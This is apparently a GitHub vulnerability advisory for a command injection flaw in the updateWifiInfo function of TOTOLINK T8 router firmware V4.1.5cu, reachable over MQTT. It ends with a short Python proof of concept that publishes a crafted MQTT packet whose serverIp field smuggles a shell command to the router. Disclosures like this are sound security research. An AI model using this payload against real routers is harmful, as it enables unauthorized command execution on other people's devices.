Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

A command injection vulnerability in the function updateWifiInfo of TOTOLINK Technology routers T8 V4.1.5cu allows attackers to execute arbitrary commands via a crafted MQTT packet.

Description

A command injection vulnerability in the function updateWifiInfo of TOTOLINK Technology routers T8 V4.1.5cu allows attackers to execute arbitrary commands via a crafted MQTT packet.

image-20230116184500942

Firmware information

image-20230116184157081

Affected version

Version: V4.1.5cu

Vulnerability details

The T8 router opens the MQTT service

image-20230116185238612

In function updateWifiInfo,The "serverIp" parameter does not filter user input, which can cause command injection vulnerabilities

image-20230116184932045

POC

import paho.mqtt.client as mqtt

client = mqtt.Client()
client.connect("192.168.0.1",1883,60)
client.publish("totolink/router/updateWifiInfo", b'{"newMd5":"1","serverIp":";ls>/tmp/updateWifiInfo.txt;"}')

image-20230116185057455